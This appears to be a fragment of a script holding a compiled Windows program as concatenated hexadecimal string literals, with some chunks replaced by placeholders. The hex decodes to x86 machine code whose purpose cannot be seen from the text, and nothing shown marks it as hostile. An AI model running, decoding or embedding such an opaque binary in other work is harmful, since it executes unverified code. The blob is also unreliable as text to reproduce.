'508bcee8706800008d45e4508bcee8376800008d45e0508bcee82c6800008' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0000e82f6700008d45d8508bcee8ec6700008d45e4508bcee8b36700008d4' \
'<KEY>' \
'd48d49f0e8d6d0ffff8b4dd08d49f0e8cbd0ffff4b75998b7df08d4768508' \
'bcee86e670000e84ea40000c20800568bf1ff7624c70628014200e8318a00' \
'00837e0800597414ff7608e88c71000033c05989460889460c8946105ec35' \
'58bec568bf1e8c7fffffff6450801740756e867710000598bc65e5dc20400' \
'568bf133c9c70628014200894e08894e0c894e1033c0894e1466894604a1a' \
'c804200894e24894e1c85c07505e88d4d00008946208bc65ec3568bf1578b' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'68946048946085b5f5ec353568bf15733dbbf00604200578d4e1c891e895e' \
'04895e08e87ccfffff578d4e20e873cfffff578d4e28e86acfffff578d4e3' \
'4e861cfffff578d4e38e858cfffff578d4e40e84fcfffff578d4e48e846cf' \
'ffff578d4e4ce83dcfffff895e50895e54895e58895e5c895e60895e64578' \
'd8e8c000000895e70895e74895e78e816cfffff83c8ff89467c8986840000' \
'008986880000008986900000008986940000008986980000008946145f895' \
'e0c885e1066895e19895e6c885e24885e2c66895e3c899e9c000000885e18' \
'899e80000000885e44895e68889ea0000000c74630200000008bc65e5bc36' \
'a14b8fe8f4100e889a200008bf28bf9897dec8b0e6a220fb7015a33db663b' \
'd07528528d410250e83c7100005959890685c0742183c0028906eb1a8b066' \
'<KEY>' \
'3918741383c00289060fb70050e8e97000005985c075e66a0b6834014200f' \
'f36e8258a000083c40c85c074156a0b684c014200ff36e8108a000083c40c' \
'<KEY>' \
'0005985c075e66a036864014200ff36e8858b000083c40c85c00f859e0000' \
'0083060653536aff8d45e0508d45e8506aff8d45f0506a6453895df0895de' \
'<KEY>' \
'e4ff74f004e862c3ffff8d45e4508bcf895dfce81ff2ffff834dfcff8b4de' \
'48d49f0e89fcdffff463b75e872ce8b7decff75f0ff155ca241008b477089' \
'<KEY>' \
'ac1e94f0200008b066a4059663b080f854201000083c0028945e451eb108b' \
'06663918741383c00289060fb70050e8b66f00005985c074e6ff75e48d4de' \
'0e8cec2ffff8bc8c745fc010000008b062b45e4d1f8508d45e850e8711400' \
'00c645fc038b4de08d49f0e8ffccffff8b55e88d4de4e814650000508d4de' \
'<KEY>' \
'4dece8a2ccffffc645fc058b75e88d55ec8bcee87e65000084c00f8484000' \
'00068a40142008d4dece84e14000050e84d8a00005959eb4c508d4df0e838' \
'c2ffff8d4df0c645fc06e8cc1200008b45f08378f400740c8d45f08d4f705' \
'0e86214000068a401420053e8148a00005959c645fc058b4df08945e08d49' \
'f0e852ccffff8b45e085c075b08b47703b4774750cb201b9ac014200e8415' \
'e00008b47703b47740f95c38b4dec83c1f0e823ccffff8d4ef0e81bccffff' \
'8ac3e9ff0000006a0268e001420050e87f89000083c40c85c00f85e500000' \
'08b068d4804894de4eb0c8b06663918741383c00289060fb70050e85b6e00' \
'005985c074e6ff75e48d4de0e873c1ffffc745fc070000008b0e2b4de4d1f' \
'9518d4de4518bc8e816130000c645fc098b4de08d49f0e8a4cbffff68e801' \
'42008d4de4e84013000050e83f89000059598bf0eb48568d4dece828c1fff' \
'f8d4decc645fc0ae8bc1100008b45ec8378f400740c8d45ec8d4f7050e852' \
'13000068e801420053e8048900005959c645fc098b4dec8bf08d49f0e843c' \
'<KEY>' \
'47748b4de40f95c383c1f0e9f7feffffb001e8a99e0000c3568bf1eb09668' \
'33e00741183c6020fb70650e8766d00005985c075e98bc65ec36a18b80c91' \
'4100e89f9e00008955f08b316a2d33db59895de0eb0233db0fb706663bc87' \
'40c6a2f59663bc80f85db010000391a7502893283c6028975e80fb70650e8' \
'136d00005985c075086a4058663b06750a66391e740583c602ebe033c0663' \
'b060f84b30100008b55e88bfe2bfad1ff895de48b0cdd006f42008d410289' \
'<KEY>' \
'fff33c08d4dec8945fce855c0ffff57ff34dd006f4200ff75ece8ab870000' \
'834dfcff8b4dec83c40c8d49f085c07448e81dcaffff8b55e843895de483f' \
'<KEY>' \
'0000008b08b201e8f45b00008b45dc8d48f0e8dfc9ffffe912010000e8d5c' \
'<KEY>' \
'42008b55f06a2d590f84d7feffff663bc80f84cefeffff6a2f5a663bd08b5' \
'5f00f84bffeffff8b04dd006f4200b94c024200668b10663b11751e6685d2' \
'<KEY>' \
'80185c0751556e8259200008b55f0596a2d5985c00f846ffeffff33c06a22' \
'8ad85f0fb70650e8b16b00005985c0740966393e740484db74170fb706668' \
'<KEY>' \
'f08bf033c06a2d59663b060f851dfeffff3804dd056f42007514e90ffefff' \
'f33c966894efe8b4d08b0018931eb0eb201b940034200e8d25a000032c0e8' \
'<KEY>' \
'8fbffffe8c5f9ffff84c00f84810000008b8dd8fbffffe87cfdffff8bf085' \
'f674706a0268e403420056e8f085000083c40c85c0745c6a0268ec0342005' \
'6e8dc85000083c40c85c07448568d8dfcfbffffe8f7bdffff33db8d85d8fb' \
'ffff895dfc508d9500fcffff8d8dfcfbffff899d00fcffff899dd8fbffffe' \
'839fdffff5984c075168b85fcfbffff8d48f0e815c8ffff32c0e8bb9b0000' \
'c351518d8de4fbffffe8a6b8ffffc645fc01ffb500fcffff8d8de4fbffffe' \
'836b9ffffbee4024200568d8500fcffff508d8de4fbffffe8c4bcffff8b85' \
'00fcffff3b85ecfbffff0f84a8000000568d8de4fbffffe835bdffff508d8' \
'd00fcffffe84fbdffffbee8014200568d8d00fcffffc645fc02e83d0f0000' \
'50eb2a50e85e900000598995d0fbffff85c074170fb7c08985dcfbffff8d8' \
'5dcfbffff508bcfe836efffff5653e810850000595985c075cb8b073b4704' \
'752ab201b9f8034200e8535900008b8d00fcffff8d49f0e83bc7ffff8d8de' \
'4fbffffe84bb8ffffe908ffffffc645fc018b8d00fcffff8d49f0e819c7ff' \
'ff68500242008d8500fcffff508d8de4fbffffe8f3bbffff8b8500fcffff3' \
'b85ecfbffff745868640242008d8500fcffff508d8de4fbffffc6470c01e8' \
'cabbffff8b8500fcffff3b85ecfbffff7406c6470d01eb2968680242008d8' \
'500fcffff508d8de4fbffffe89fbbffff8b8500fcffff3b85ecfbffff7404' \
'c6470e0168700242008d8500fcffff508d8de4fbffffe876bbffff8b8500f' \
'cffff3b85ecfbffff7404c6470f01be4c024200568d8500fcffff508d8de4' \
'fbffffe84cbbffff8b8500fcffff3b85ecfbffff7456834f14ff568d8500f' \
'cffff508d8de4fbffffc6471801e823bbffff8b8500fcffff3b85ecfbffff' \
'742d8b40148378f4007424568d8de4fbffffe88fbbffff85c075048bc3eb0' \
'd50e8d48e0000598995d0fbffff894714683c0242008d8500fcffff508d8d' \
'e4fbffffe8d1baffff8b8500fcffff3b85ecfbffff7410807f24007574807' \
'f1a00756ec647190168380242008d8500fcffff508d8de4fbffffe89cbaff' \
'ff8b8500fcffff3b85ecfbffff7410807f24007550807f1900754ac6471a0' \
'1be34024200568d8500fcffff508d8de4fbffffe866baffff8b8500fcffff' \
'3b85ecfbffff74568b47703b4774751fb9c8044200eb05b944044200b201e' \
'856570000e90cfeffffb980044200ebed568d8de4fbffffe8b4baffff85c0' \
'75048bc3eb0d50e8f98d0000598995d0fbffff89476c85c07507b91805420' \
'0ebbebe20024200568d8500fcffff508d8de4fbffff889de3fbffffe8e4b9' \
'ffff8b8500fcffff3b85ecfbffff741c568d8de4fbffffe859baffff508d4' \
'f1ce8c2baffffc685e3fbffff01be24024200568d8500fcffff508d8de4fb' \
'ffffe8a2b9ffff8b8500fcffff3b85ecfbffff0f840401000068006042008' \
'd8df8fbffffe866c4ffff568d8de4fbffffc645fc03e8ffb9ffff508d8ddc' \
'fbffffe819baffffb83805420050508d8ddcfbffffc645fc04e84e0b00008' \
'<KEY>' \
'f8fbffffe8de0b000050e8dd8100005959508d4f1ce816baffffb83c05420' \
'050508d4f1ce8060b00008bc8e87d0c00008d8df8fbffffe8da0b0000682c' \
'0242008d8500fcffff508d8de4fbffffc685e3fbffff01e8d6b8ffff8b850' \
'0fcffff3b85ecfbffff741cffb5dcfbffffff1554a1410085c0750c32d2b9' \
'40054200e8c55500008b8ddcfbffff8d49f0e8adc3ffffc645fc018b8df8f' \
'bffff8d49f0e89bc3ffff681c0242008d8500fcffff508d8de4fbffffe875' \
'b8ffff8b8500fcffff3b85ecfbffff0f8430010000681c0242008d8de4fbf' \
'fffe8e2b8ffff508d4f20e84bb9ffff8b47208378f400750ab974054200e9' \
'f3fdffff80bde3fbffff000f85f700000033c068e603000066898504fcfff' \
'f8d8506fcffff5350e8c48d000083c40c6894054200e809840000596af6ff' \
'15cca041008bf08d85dcfbffff5056ff15f4a041008b8ddcfbffff83e1fb8' \
'3c9025156ff150ca14100538d8500fcffff5068f30100008d8504fcffff50' \
'56899d00fcffffff1558a141008b8500fcffff03c03de80300000f83a3000' \
'00033c966898c0504fcffff8d8d04fcffff8d41028985f8fbffff668b0183' \
'c102663bc375f52b8df8fbffff8d8504fcffffd1f951508d4f1ce8e6c0fff' \
'f68a40142008d4f1ce858090000ffb5dcfbffff56ff150ca1410068a40142' \
'00e848830000803d3280420000590f8507fbffff68400242008d8500fcfff' \
'f508d8de4fbffffe81cb7ffff8b8500fcffff3b85ecfbffff7424807f1a00' \
'740fb9ac054200e9bafcffffe81e6a0000807f19007403885f19c6472401e' \
'b2968440242008d8500fcffff508d8de4fbffffe8d3b6ffff8b8500fcffff' \
'3b85ecfbffff7404c6471001686c0242008d8500fcffff508d8de4fbffffe' \
'8aab6ffff8b8500fcffff3b85ecfbffff742c686c0242008d8de4fbffffe8' \
'1bb7ffff508d4f28e884b7ffff8b47288378f400750ab9e8054200e92cfcf' \
'fff68480242008d8500fcffff508d8de4fbffffe859b6ffff8b8500fcffff' \
'3b85ecfbffff7414807f2400750ab90c064200e9f7fbffffc6472c0168740' \
'242008d8500fcffff508d8de4fbffffe820b6ffff8b8500fcffffbe004000' \
'003b85ecfbffff7403897730687c0242008d8500fcffff508d8de4fbffffe' \
'8f3b5ffff8b8500fcffff3b85ecfbffff740389773068940242008d8500fc' \
'ffff508d8de4fbffffe8cbb5ffff8b8500fcffff3b85ecfbffff7407c7473' \
'00080000068ac0242008d8500fcffff508d8de4fbffffe89fb5ffff8b8500' \
'fcffff3b85ecfbffff7407c747308000000068b80242008d8500fcffff508' \
'd8de4fbffffe873b5ffff8b8500fcffff3b85ecfbffff7407c74730000100' \
'0068cc0242008d8500fcffff508d8de4fbffffe847b5ffff8b8500fcffff3' \
'b85ecfbffff7407c747304000000068000342008d8500fcffff508d8de4fb' \
'ffffe81bb5ffff8b8500fcffff3b85ecfbffff7404c6473c0168180342008' \
'd8500fcffff508d8de4fbffffe8f2b4ffff8b8500fcffff3b85ecfbffff74' \
'07c687a000000001bee8024200568d8500fcffff508d8de4fbffffe8c5b4f' \
'fff8b8500fcffff3b85ecfbffff0f84ef000000807f0c00750ab93c064200' \
'e95ffaffff568d8de4fbffffe826b5ffff508d8df8fbffffe840b5ffffc64' \
'5fc058b85f8fbffff8378f4007517b960064200b201e8885100008b8df8fb' \
'ffffe930f8ffff8d8df8fbffffe8110700006a5c50e8687a00008bf059598' \
'5f6745a33c06689068d8db0fbffff83c602e867e7ffff8bcec645fc06e8c0' \
'b7ffff50568d8db0fbffffe89fbdffff8d85b0fbffff508d4f50e868e9fff' \
'fc645fc058b8db4fbffff8d49f0e80cbfffff8b8db0fbffff8d49f0e8febe' \
'ffff8d8df8fbffffe8ca060000ffb5f8fbffff8d4f48e8d7b4ffffc645fc0' \
'18b8df8fbffff8d49f0e8d3beffff68f40242008d8500fcffff508d8de4fb' \
'ffffe8adb3ffff8b8500fcffff3b85ecfbffff0f84f40100008d77508b063' \
'b4604740ab988064200e943f9ffff807f0c00750ab9d0064200e933f9ffff' \
'68f40242008d8de4fbffffe8f6b3ffff508d8df8fbffffe810b4ffffc645f' \
'c078b95f8fbffff837af400750ab9f4064200e9cbfeffff8d8d00fcffffe8' \
'65560000508d8df8fbffffc645fc08e89cbdffffc645fc078b8d00fcffff8' \
'd49f0e823beffff68006042008d8ddcfbffffe8eabdffffc645fc098b8df8' \
'fbffff8d95dcfbffffe8c256000084c075138b8ddcfbffff8d49f0e8ecbdf' \
'fffe969feffff8d8df8fbffffe8850500006a5c50e8dc780000595985c074' \
'0533c96689088d8df8fbffffe895050000ffb5f8fbffff8d4f48e8a2b3fff' \
'f68a40142008d8ddcfbffffe84905000050e8487b00005959e99d00000050' \
'8d8d00fcffffe82db3ffff8d8d00fcffffc645fc0ae8be0300008b8500fcf' \
'fff8378f400744b8d8db0fbffffe883e5ffff8d8500fcffff508d8db0fbff' \
'ffc645fc0be8b2bcffff8d85b0fbffff508bcee887e7ffff8b8db4fbffff8' \
'd49f0e82fbdffff8b8db0fbffff8d49f0e821bdffff68a401420053e8c47a' \
'00005959c645fc098b8d00fcffff8985d0fbffff8d49f0e8fcbcffff8b85d' \
'0fbffff85c00f855bffffff8b063b46047511b201b920074200e8e54e0000' \
'e9dcfeffff8b8ddcfbffff8d49f0e8c8bcffffc645fc018b8df8fbffff8d4' \
'9f0e8b6bcffff68540242008d85d0fbffff508d8de4fbffffe890b1ffff8b' \
'85d0fbffff3b85ecfbffff7414807f0c00750ab944074200e92ef7ffffc64' \
'7440168080342008d85d0fbffff508d8de4fbffffe857b1ffff8b85d0fbff' \
'ff3b85ecfbffff742c68080342008d8de4fbffffe8c8b1ffff508d4f40e83' \
'1b2ffff8b47408378f400750ab96c074200e9d9f6ffffbe10034200568d85' \
'd0fbffff508d8de4fbffffe805b1ffff8b85d0fbffff3b85ecfbffff74428' \
'07f0f00740ab998074200e9a3f6ffff568d8de4fbffffe86ab1ffff85c075' \
'048bc3eb0d50e8af840000598995d0fbffff89476885c0750ab9e0074200e' \
'<KEY>' \
'd8fbffffe8305e00008bf0595985f60f845af4ffffffb5d8fbffff8d8d00f' \
'cffffe82ab1ffffc645fc0c8bce2b8dd8fbffffd1f9518d8dd0fbffff518b' \
'<KEY>' \
'bffffc645fc018b8d00fcffff8d49f0e83abbffff83c602eb7451eb0c6639' \
'1e741183c6020fb70650e89f5d00005985c074eaffb5d8fbffff8d8d00fcf' \
'<KEY>' \
'e8510200008d4f3450c645fc0fe848baffff8b8dd0fbffff8d49f0e8d3baf' \
'<KEY>' \
'084200e95bf5ffff8bcee898efffff508d4f38e890b0ffff807f0c000f84b' \
'80000008d8db0fbffffe8abe2ffff8d4734508d8db0fbffffc645fc10e8dd' \
'b9ffff8d8db0fbffff518d4f5ce8b1e4ffff8d77508b063b4604750e8d85b' \
'<KEY>' \
'e881e4ffff83c61c3b775475ef33db8bcfe87cdaffff84c0752ab201b9580' \
'84200e8204c00008b8db4fbffff8d49f0e808baffff8b8db0fbffff8d49f0' \
'e8fab9ffffeb1e8b8db4fbffff8d49f0e8eab9ffff8b8db0fbffff8d49f0e' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'b7ffff8b0f8bd08b41f48bf02bf38d0445020000008d0c7502000000518d0' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'8eb13e827ddffff8b4d08505657e8e8aeffff8b45085f5ec9c20800568bf1' \
'8b1683ea10837a0c017e0dff7204e85eb5ffff8b1683ea10ff4a0c8b420c6' \
'<KEY>' \
'<KEY>' \
'32c393e77282b3ec1ff023b4608750651e8c3dcffff8b5e048b0e895d0889' \
'5df08365fc0085db74338b0cb9eb213b4608750651e8a0dcffff8b5e04895' \
'd08895df0c745fc0100000085db740f8b0f83e910e8a9b6ffff83c0108903' \
'83460404e82d8b0000c20400558bec53568b75088bd985f6746b66833e007' \
'465578b3beb130fb7c05056e8fd590000595985c0740b83c7020fb7076685' \
'<KEY>' \
'bf02bf78d0445020000008d0c7502000000518d0c7a515052e81400000083' \
'c4108bcb56e860b5ffff5f5e8bc35b5dc20400558becff7514ff7510ff750' \
'cff7508e8b85a000050e834b3ffff83c4145dc36a04b8ae914100e8a18a00' \
'008bf28bf9ff15c0a0410056578d45f068d808420050e88e46000083c4108' \
'365fc008b30ff15c0a041008bd08bcee84a4800008b4df08d49f0e8a8b6ff' \
'ffe83c8a0000c36a04b8ae914100e8528a00008bda8bf1568d4df0e82facf' \
'fff8365fc006a405633ffe80a590000595985c075386a5c56e8fc58000059' \
'5985c07425be2c014200568d4df0e802feffff50e801740000566a008bf8e' \
'8f773000083c4108bf0eb05bf28fd4100568bcbe827acffff8b4d0857e81e' \
'acffff8b4df08d49f0e821b6ffffe8b5890000c36a24b802924100e8cb890' \
'0008955d08bf9897de88365d400807f24000f84a30000008b878800000033' \
'db4383f8ff740885c00f853f03000033d2b928094200e81d4a0000e8a80b0' \
'00089878800000083f8ff745e85c0745a32d2b998094200e8c14700008365' \
'ec008d45ec50536a026a006800000002ffb788000000ff156ca0410085c07' \
'41affb788000000ff15c4a041008b45ec898788000000e9d70200006a715a' \
'b9c8094200e87dfeffffe9c5020000b201b950094200e86747000032c0e9b' \
'40200008b47208378f4000f84a2010000be00604200568d4de0e812b5ffff' \
'8365fc00568d4de4e805b5ffff33db438d45e4885dfc8b4f20508d55e0895' \
'ddce874feffff8b7de459837ff4007518568d4dece8dab4ffff8d4dece8d1' \
'b1ffff8b75ec8bcbeb118d4ff0e8f3b3ffff8d70106a028975ec598b45e88' \
'b5de0894df08d8888000000516a036a02ff701c8d55ec894dd4ff3253ff15' \
'54a041008945d88b45f0a802740e83e0fd8d4ef08945f0e8a5b4ffff33c04' \
'08945fc8b4df084c8740b8b4dec8d49f0e88db4ffffff15c0a04100837dd8' \
'008945ec0f84870000008b75d4833eff747f833e00747a8365ec008d45ec5' \
'06a016a026a006800000002ff36ff156ca0410085c0740fff36ff15c4a041' \
'008b45ec8906eb0fba88000000b9c8094200e83ffdffff833eff746c833e0' \
'074678b45e880781000755e33d2b9040a4200e85748000033d2b92c0a4200' \
'e84b480000ff7508ff36ff1578a241008b4dd08901eb348b45e8ff70208d4' \
'5d068d409420050e8a243000083c40cc645fc048b55ec8b08e8654500008b' \
'4dd08d49f0e8c3b3ffffc645dc008d4ff0e8b7b3ffff8d4bf0e8afb3ffff8' \
'a45dce905010000837d0c00742fff750cff1550a041008bf0ff15c0a04100' \
'85f6750e8bd0b9500a4200e817450000eb0c32d2b9940a4200e87c450000f' \
'f155ca141008b3530a141006a0233db43538945e86a008d45e850ffd650ff' \
'75e8ffd650ff1560a14100ff15c0a0410081c78800000057536a0aff75e8f' \
'f154ca041008bf0ff15c0a041003df00300007518576a0aff1530a1410050' \
'ff1568a041008bf0ff15c0a0410085f67512ff15c0a041008bd0b9c00a420' \
'0e8894400008365dc008d45dc50536a026a006800000002ff37ff156ca041' \
'0085c0740fff37ff15c4a041008b45dc8907eb0fbab3000000b9c8094200e' \
'8c5fbffffff1548a04100833fff7405833f00750233db8ac3e836860000c3' \
'68bc000000b897924100e8498600008bf18975c46a0733c033db895de4598' \
'dbd3cfffffff3ab8b4620898540ffffff528d8538ffffff508d55b08bce89' \
'5db0c78538ffffff20000000c7853cffffff01000000e829fcffff595984c' \
'00f842007000033c0895db48d7db8abab6a40ab8d855cffffff5350e8c67c' \
'000083c40c33ff6a0558668945888b869800000047c78558ffffff4400000' \
'0897d8483f8ff742085c0741c8945988b86940000008945908b8690000000' \
'894594c7458401010000ff76348d45f068040b420050e88d41000083c40c8' \
'95dfc8b46388378f400741d57683c0542008d4df0e898d7ffff8b46388d4d' \
'f0ff70f450e889d7ffff8b46288bcb3948f4895dec0f45c8807e1800894dd' \
'4895da0895da4895da87506807e2c007443ff76148d55a08bcee8ecc4ffff' \
'5985c0750cb201b9100b4200e86443000083bd60ffffff00b9580b42000f4' \
'58d60ffffff807e2c00b8780b42000f44c1898560ffffff8dbe880000006a' \
'01ff378d45e850895de8897dc8ff1574a24100837de8006a14b9140400005' \
'80f45c1807e3c008945dc7405e816480000807e1a00740f8bcfe87a080000' \
'84c00f84c2050000807e1900740f8bcfe8e709000084c00f84ad050000bb0' \
'0604200538d4dace89db0ffff538d4dccc645fc01e890b0ffff8d45ccc645' \
'fc028b4e20508d55ace804faffff807e24008b5dac8b7dcc590f84d300000' \
'0ff75f08d45d868a00b420050e84740000083c40cc645fc038b0832d2e87e' \
'420000c645fc028b4dd88d49f0e865b0ffff8b868800000083f8ff740485c' \
'0750cb201b9fc0b4200e85442000033d2b9280c4200e884440000ffb68800' \
'0000ff1544a0410085c07512ff15c0a041008bd0b9580c4200e8b34100003' \
'3d2b9840c4200e85644000033d2b9c00c4200e84a4400008d45b4508d8558' \
'ffffff50ff75d433c0ff75e88d4df0ff75dc6a015050e88bf7ffff506a00f' \
'fb688000000ff1540a041008945e4ff15c0a041008945ece9d30100008b46' \
'208378f4000f84d901000050ff75f08d45d868f80c420050e8663f000083c' \
'410c645fc048b0832d2e89d410000c645fc028b4dd88d49f0e884afffff80' \
'7e1a000f85de000000837ff400752768006042008d4dd0e83eafffff8d4dd' \
'0e835acffff8d45d08945d833c0c645fc068b75d040eb1e8d4ff0e84caeff' \
'ff8d70108975d08d45d06a028945d8c745fc07000000588945e48945ec8b4' \
'5c48d4df08b401c8945e08d45b4508d8558ffffff50ff75d4ff75e8ff75dc' \
'e8adf6ffff8b4dc45033c03841106a000f94c050ff75e08b45d8ff3053ff1' \
'53ca041008945e48b45eca802741183e0fd8d4ef08945ece8ceaeffff8b45' \
'ecc745fc02000000a801740b8b4dd08d49f0e8b5aeffffff15c0a041008d4' \
'df08945ece87bf6ffff8b75c48b45e4eb0533c08945e485c00f85fe010000' \
'8b868800000083f8ff0f848902000085c00f848102000033d2b9840c4200e' \
'8b242000033d2b9c00c4200e8a642000033d2b9280c4200e89a420000ffb6' \
'88000000ff1544a0410085c07512ff15c0a041008bd0b9580c4200e8c93f0' \
'0008d45b4508d8558ffffff50ff75d433c0ff75e88d4df068140400006a01' \
'5050e8b7f5ffff506a00ffb688000000ff1540a041008945e4ff15c0a0410' \
'0f7d81bc02145ec8d4df0e8bef5ffffff1548a04100e941010000ff75f08d' \
'45e068400d420050e88e3d000083c40cc645fc088b0832d2e8c53f0000c64' \
'5fc028b4de08d49f0e8acadffff33d2b9840c4200e8e641000033d2b9c00c' \
'4200e8da41000033d2b9280c4200e8ce41000033c039868800000074368d4' \
'db4518d8d58ffffff51ff75d48d4df0ff75e8ff75dc6a015050e807f5ffff' \
'506a00ffb688000000ff1540a041008945e485c0752c8d4db4518d8d58fff' \
'fff51ff75d48d4df0ff75e8ff75dc6a015050e8d1f4ffff506a00ff1564a1' \
'41008945e4ff15c0a041008bc8894dec85c9746aff75988b55d4ff759485d' \
'2ff7590b89c0d42000f45c2837de80050ba9c0d4200b8ac0d42000f44c283' \
'be880000000050b8b80d42000f44c250ff75f08d45e05168d00d420050e88' \
'53c000083c428c645fc098b0832d2e8bc3e0000c645fc028b4de08d49f0e8' \
'a3acffff8d4df0e872f4ffff837de4000f849a000000803d3380420000740' \
'c32d2b9b00e4200e8863e00008b45bc8b4db4894e7c8986800000008b063b' \
'4604745133c08945d88945dc8d45d8508d45dc5051ff1568a141008b0633c' \
'9894ddc394604742133ff0fb70833d24249d3e283c0022355d80bfa897ddc' \
'<KEY>' \
'0a14100ff75b8ff1574a14100ff75b8ff15c4a04100eb4fff75f08d45e068' \
'dc0e420050e8a93b000083c40cc645fc0a8b55ec8b08e86c3d0000c645fc0' \
'28b4de08d49f0e8c6abffff817dece40200007515803d3380420000750c32' \
'd2b9080f4200e8b23d0000807da80074116a048d45a0506a0cff75a4ff156' \
'0a04100807e3c007405e838430000837de8007409ff75e8ff1570a2410033' \
'f68975e83975b07411ffb554ffffff8b45c8ff30ff157ca241008b45c8833' \
'8ff74113930740dff30ff15c4a041008b45c889303975e48d4ff00f95c088' \
'45e0e832abffff8d4bf0e82aabffff8b5de08b4df083c1f0e81cabffff8ac' \
'3e8ae7e0000c36a34b88b914100e8c47e00008bf28bd9895de433ff897dfc' \
'897dec6800604200897de8e8c3aaffff33c0408945ec897dcc897dd0897dd' \
'46a408d4dcc8945fce8bd040000897dd8897ddc897de06a408d4dd8c645fc' \
'02e8a6040000897dc0897dc4897dc8bf00040000578d4dc0c645fc03e88b0' \
'400008d45e850578b7dc0576a0156ff1564a0410085c0742d8365f0008d45' \
'f050ff37ff1538a0410085c0740aff75f08bcbe85ca0ffff837df0007409f' \
'f75f0ff1578a1410085ff740757e84b4b000059837dd8007409ff75d8e83c' \
'4b000059837dcc007409ff75cce82d4b0000598bc3e8c47d0000c3558bec6' \
'aff683291410064a1000000005051b820a00000e874fe0000a16063420033' \
'c58945ec535657508d45f464a3000000008965f033f668fc9f00008d85ec5' \
'fffff565089b5e85fffffe88074000083c40c8d85d85fffff506800a00000' \
'8d85e85fffff5089b5d85fffffff1568a2410085c0750ab9800f4200e9100' \
'100008b85d85fffffc1e8028985d45fffff8bfe89b5dc5fffff3bf80f83ec' \
'000000ffb4bde85fffff566800040000ff157ca141008bd8899dd05fffff8' \
'5db0f84aa0000008d85e45fffff50681f0002005389b5e45fffffff1568a0' \
'410085c074798975fc8b95e45fffff8d8de05fffffe823feffff68f80f420' \
'08d8de05fffffc645fc01e8c7a0ffff85c0751f53ff15c4a041008b8de05f' \
'ffff8bb5e45fffff83c1f0e804a9ffff8bc6eb6f8b8de05fffff8d49f0e8f' \
'2a8ffff834dfcffeb20b874764000c3834dfcff8bbddc5fffff8b9dd05fff' \
'ff33f6eb06ff15c0a04100ffb5e45fffffff15c4a04100eb06ff15c0a0410' \
'053ff15c4a041008b85d45fffff4789bddc5fffffe90cffffffb910104200' \
'b201e89d3a000033c08b4df464890d00000000595f5e5b8b4dec33cde8784' \
'90000c9c3558beca1a880420083ec0c5356578bf985c07413833da4804200' \
'00740a8b15a080420085d2754b685c104200ff1528a141008bd885db742f8' \
'b35a4a04100687810420053ffd6688c10420053a3a0804200ffd668a81042' \
'0053a3a4804200ffd6a3a8804200eb05a1a88042008b15a080420085c00f8' \
'4f5000000833da4804200000f84e800000085d20f84e0000000833fff0f84' \
'd0000000833f000f84c700000033db538d45fc506a0168000002006a02895' \
'df8895dfcffd285c07517ff15c0a041008bd0b938114200e83f390000e9a7' \
'000000395dfc743b53538d45f850ff37ff75fcff15a480420085c0751dff1' \
'5c0a041008bd0b990114200e80e390000ff75fcff15a8804200eb70ff75fc' \
'ff15a8804200837df8ff744e395df87449ff378b35c4a04100ffd68b45f88' \
'd4df4516a016a02536800000002508907895df4ff156ca0410085c0740bff' \
'37ffd68b45f48907eb0fba59020000b9c8094200e822f0ffffb001eb15b90' \
'0124200eb05b9b8104200b201e80639000032c05f5e5bc9c3558bec83ec10' \
'53568d45f8506a048d45f0508bf16a12ff3633db895df8ff1564a0410085c' \
'0747d837df0030f858f0000008d45f8506a048d45fc506a13ff36895dfcff' \
'1564a0410085c074428d45f4506a016a02536800000002ff75fc895df4ff1' \
'56ca0410085c0740eff75fcff15c4a041008b45f4eb12ba71020000b9c809' \
'4200e87defffff8b45fc8906eb32ff15c0a041008bd0b95c124200e8ec370' \
'00032c0eb1eff15c0a041008bc849741183e956740c8bd0b998124200e8cc' \
'370000b0015e5bc9c3568bf1833e007412ff36e81a47000033c0598906894' \
'<KEY>' \
'76298d34723bf27505895304eb603bf0745c8bc82bc8d1f98d3c09575056e' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'd60f42d652e840ccffff5f5e5dc2040068ecfa4100e86b450000cc558bec6' \
'aff689d94410064a10000000050b84c000100e874f90000a16063420033c5' \
'8945f0535657508d45f464a3000000008995ccfffeff8bf989bdd8fffeff8' \
'b450883a5d4fffeff008985d0fffeffbe28fd41008bca668b1133db43663b' \
'<KEY>' \
'9eb041bc90bcb85c90f84d403000050ffb5ccfffeff8d85ccfffeff680413' \
'420050e84834000083c41033c9894dfc384d0c0f84940300008d85c8fffef' \
'f5051515153898dc8fffeffff1548a241008bb5ccfffeff85c00f85080100' \
'0033c068ffff0000508885ebfffeff8885f0fffeff8d85f1fffeff50e8d56' \
'e0000838decfffeffff83c40c8d85e0fffeff508d85f0fffeff508d85ecff' \
'feff50ffb5c8fffeffc785e0fffeff00000100ff154ca2410083a5e4fffef' \
'f0083bdecfffeff0076468d850400ffff8985dcfffeff56ff30e87a650000' \
'595985c074268b8de4fffeff8b85dcfffeff4183c020898de4fffeff8985d' \
'cfffeff3b8decfffeff72ceeb06889debfffeffffb5c8fffeffff1544a241' \
'0080bdebfffeff0074486840ff4100ffb5d0fffeffe8e0610000595985c07' \
'40cc6879d00000000e99c0200006830ff4100ffb5d0fffeffe8be61000059' \
'5985c00f8482020000c6879c00000000e97602000033d26a0733c08995a8f' \
'ffeff598dbdacfffefff3ab8b85d8fffeff8995acfffeff8b48208995b8ff' \
'feff89b5bcfffeff8995c4fffeff3951f4753568006042008d8de4fffeffe' \
'8d3a2ffff8d8de4fffeffe8c79fffff8d95e4fffeffc645fc028bfb8b9de4' \
'fffeff8995e0fffeffeb2783c1f0e8d6a1ffff8d5810899de4fffeff8d85e' \
'4fffeff6a028985e0fffeffc745fc030000005f8b85d8fffeff89bdd4fffe' \
'ff8b481c89bdecfffeff8379f400753268006042008d8ddcfffeffe85ca2f' \
'fff8d8ddcfffeffe8509fffff83cf0489bdecfffeff8bbdd4fffeff8d85dc' \
'fffeffeb1e83c1f0e862a1ffff838decfffeff088d781089bdd4fffeff8d8' \
'5d4fffeff8b8de0fffeff6a00ff31ff308d85a8fffeff50ff1554a2410089' \
'85e0fffeff8b85ecfffeffa808741783e0f78d4ff08985ecfffeffe80ba2f' \
'fff8b85ecfffeffa804741d8b8ddcfffeff83e0fb8d49f08985ecfffeffe8' \
